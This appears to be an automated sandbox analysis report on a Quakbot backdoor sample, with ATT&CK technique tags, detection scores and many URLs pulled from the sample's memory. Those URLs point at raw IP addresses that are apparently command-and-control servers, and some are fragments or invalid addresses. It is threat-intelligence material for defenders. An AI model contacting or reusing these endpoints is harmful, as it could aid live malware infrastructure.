Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	File and Directory Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Information Discovery13	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
K9jgh4owKk.exe	60%	Virustotal		Browse
K9jgh4owKk.exe	26%	Metadefender		Browse
K9jgh4owKk.exe	60%	ReversingLabs	Win32.Backdoor.Quakbot
K9jgh4owKk.exe	100%	Avira	HEUR/AGEN.1138764
K9jgh4owKk.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.K9jgh4owKk.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1115135		Download File
0.0.K9jgh4owKk.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138764		Download File

Domains

Source	Detection	Scanner	Label	Link
windowsupdate.s.llnwi.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://46.101.175.170:10172/y	0%	Avira URL Cloud	safe
https://103.9.36.172/v$	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/w	0%	Avira URL Cloud	safe
https://103.9.36.172/H4	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/J2	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/t	0%	Avira URL Cloud	safe
https://103.70.29.126:593/aphy	0%	Avira URL Cloud	safe
https://103.9.36.172/101.175.170:10172/L	0%	Avira URL Cloud	safe
https://103.70.29.126:593/ll	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/_3	0%	Avira URL Cloud	safe
https://103.9.36.172/101.175.170:10172/ication	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/l	0%	Avira URL Cloud	safe
https://103.9.36.172/101.175.170:10172/W	0%	Avira URL Cloud	safe
https://103.70.29.126/	0%	Avira URL Cloud	safe
https://46.101.175.170/d$	0%	Avira URL Cloud	safe
https://103.9.36.172//d$	0%	Avira URL Cloud	safe
https://103.70.29.126:593/	0%	Avira URL Cloud	safe
https://103.70.29.126:593/Q	0%	Avira URL Cloud	safe
https://463.9.36.172/	0%	Avira URL Cloud	safe
https://103.9.36.172/	0%	Avira URL Cloud	safe
https://103.70.29.126:593/R	0%	Avira URL Cloud	safe
https://103.9.36.172/vider	0%	Avira URL Cloud	safe
https://46.101.175.170/	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/S2	0%	Avira URL Cloud	safe
https://103.9.36.172/D4	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/7	0%	Avira URL Cloud	safe
https://103.9.36.172/x$	0%	Avira URL Cloud	safe
https://103.9.36.172/101.175.170:10172/Sign	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/Sign	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/m3	0%	Avira URL Cloud	safe
https://103.9.36.172/rsaenh.dllx	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/ication	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/a2	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/H	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/X2	0%	Avira URL Cloud	safe
https://103.70.29.126:593/lly	0%	Avira URL Cloud	safe
https://103.9.36.172/iversal	0%	Avira URL Cloud	safe
https://103.9.36.172/ryptprimitives.dll	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/E2	0%	Avira URL Cloud	safe
https://103.70.29.126:593//y	0%	Avira URL Cloud	safe
https://46.101.175.170/R$	0%	Avira URL Cloud	safe
https://103.9.36.172/oY	0%	Avira URL Cloud	safe
https://103.9.36.172/RY	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/Q	0%	Avira URL Cloud	safe
https://103.9.36.172/5Ze(	0%	Avira URL Cloud	safe
https://103.9.36.172/t	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/a	0%	Avira URL Cloud	safe
https://46.101.175.170:10172/r3	0%	Avira URL Cloud	safe
https://103.9.36.172/x	0%	Avira URL Cloud	safe
https://103.9.36.172/rsaenh.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windowsupdate.s.llnwi.net	178.79.225.128	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://103.9.36.172/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://46.101.175.170:10172/y	K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/v$	K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/w	K9jgh4owKk.exe, 00000000.00000002.511762640.0000000000895000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336787597.0000000000895000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/H4	K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491355139.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/J2	K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444272579.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498872671.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506114094.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.513180409.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356894421.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430945199.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463838545.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476853326.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491355139.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437583136.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396300883.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/t	K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.70.29.126:593/aphy	K9jgh4owKk.exe, 00000000.00000002.511762640.0000000000895000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/101.175.170:10172/L	K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.70.29.126:593/ll	K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255513353.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257742677.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.253117743.000000000082D000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342357782.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257700106.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255628194.000000000082C000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/_3	K9jgh4owKk.exe, 00000000.00000003.444272579.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430945199.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463838545.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476853326.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437583136.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396300883.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/101.175.170:10172/ication	K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/l	K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506114094.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.513180409.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356894421.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/101.175.170:10172/W	K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.70.29.126/	K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255513353.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257742677.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.253117743.000000000082D000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342357782.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257700106.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255628194.000000000082C000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170/d$	K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172//d$	K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.70.29.126:593/	K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.70.29.126:593/Q	K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://463.9.36.172/	K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://103.70.29.126:593/R	K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342357782.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/vider	K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170/	K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/	K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/S2	K9jgh4owKk.exe, 00000000.00000003.430945199.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/D4	K9jgh4owKk.exe, 00000000.00000003.506114094.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463838545.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476853326.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/7	K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/x$	K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/101.175.170:10172/Sign	K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/Sign	K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/m3	K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356894421.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/rsaenh.dllx	K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/ication	K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/a2	K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/H	K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/X2	K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.70.29.126:593/lly	K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/iversal	K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/ryptprimitives.dll	K9jgh4owKk.exe, 00000000.00000002.511245314.00000000007BA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/E2	K9jgh4owKk.exe, 00000000.00000003.491355139.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/W	K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp	false		unknown
https://103.70.29.126:593//y	K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170/R$	K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/oY	K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/T	K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp	false		unknown
https://103.9.36.172/RY	K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/Q	K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/5Ze(	K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
